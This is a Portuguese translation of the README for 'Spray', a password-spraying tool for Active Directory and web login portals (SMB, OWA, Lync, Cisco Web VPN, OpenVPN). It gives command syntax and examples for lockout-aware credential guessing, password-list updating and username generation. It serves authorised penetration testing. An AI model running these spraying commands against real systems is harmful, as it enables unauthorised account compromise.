
Uma ferramenta de Password Spraying para Credenciais do Active Directory por Jacob Wilkin (Greenwolf)
Uma ferramenta de Password Spraying para Credenciais do Active Directory por Jacob Wilkin (Greenwolf)
Estas instruções mostrarão os requisitos e como usar o Spray.
Todos os requisitos vêm pré-instalados no Kali Linux. Para executar em outras distribuições ou Mac, certifique-se de que curl (owa e lync) e rpcclient (smb) estejam instalados usando apt-get ou brew. (rpcclient não está disponível no macOS e, portanto, o spray smb não funcionará)
rpcclient
curl
Este script fará password spray em um alvo durante um período de tempo. Requer a política de senhas como entrada para que as contas não sejam bloqueadas.
Acompanhando este script, há uma série de arquivos de senhas artesanais para vários idiomas. Eles foram elaborados a partir das senhas mais comuns do Active Directory em vários idiomas e todas se encaixam na categoria complexa (1 maiúscula, 1 minúscula, 1 dígito).
Para fazer password spray em um Portal SMB, uma lista de usuários, lista de senhas, tentativas por período de bloqueio, duração do período de bloqueio e o domínio devem ser fornecidos.
Useage: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
Example: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS
Optionally Skip Username%Username Spray: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS skipuu
Para fazer password spray em um portal OWA, deve ser criado um arquivo da requisição POST com o Username: [email protected] e Password: spraypassword.
Useage: spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
Example: spray.sh -owa 192.168.0.1 users.txt passwords.txt 1 35 post-request.txt
Para fazer password spray em um serviço Lync, uma URL de autodescoberta do Lync ou uma URL que retorne o cabeçalho www-authenticate deve ser fornecida, juntamente com uma lista de endereços de e-mail.
Useage: spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -lync https://lyncdiscover.spiderlabs.com/ users.txt passwords.txt 1 35
Example: spray.sh -lync https://lyncweb.spiderlabs.com/Autodiscover/AutodiscoverService.svc/root/oauth/user users.txt passwords.txt 1 35
Para fazer password spray em um serviço CISCO Web VPN, um portal ou servidor alvo hospedando um portal deve ser fornecido.
Useage: spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -cisco 192.168.0.1 usernames.txt passwords.txt 1 35
Para fazer password spray em um portal web OpenVPN, um endereço IP e porta alvo devem ser fornecidos.
Useage: spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -ovpn 192.168.0.1 943 usernames.txt passwords.txt 1 35
Também é possível atualizar a lista de senhas fornecida de 2016/2017 para o ano atual.
Useage: spray.sh -passupdate <passwordList>
Example: spray.sh -passupdate passwords.txt
Um nome de empresa opcional também pode ser fornecido para adicionar à lista.
Useage: spray.sh -passupdate <passwordList> <CompanyName>
Example: spray.sh -passupdate passwords.txt Spiderlabs
Uma lista de nomes de usuário também pode ser gerada a partir de uma lista de nomes comuns.
Useage: spray.sh -genusers <firstnames> <lastnames> "<<fi><li><fn><ln>>"
Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt "<fi><ln>"
Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt "<fn>.<ln>"
Se esta ferramenta foi útil para você, sinta-se à vontade para me agradecer comprando um café para mim :)
Spray Criado por Jacob Wilkin Copyright (C) 2017 Trustwave Holdings, Inc.
Este programa é software livre: você pode redistribuí-lo e/ou modificá-lo sob os termos da Licença Pública Geral GNU (GNU General Public License) publicada pela Free Software Foundation, versão 3 da Licença, ou (a seu critério) qualquer versão posterior.
Este programa é distribuído na esperança de que seja útil, mas SEM QUALQUER GARANTIA; sem a garantia implícita de COMERCIALIZAÇÃO ou ADEQUAÇÃO A UM DETERMINADO FIM. Veja a Licença Pública Geral GNU para mais detalhes.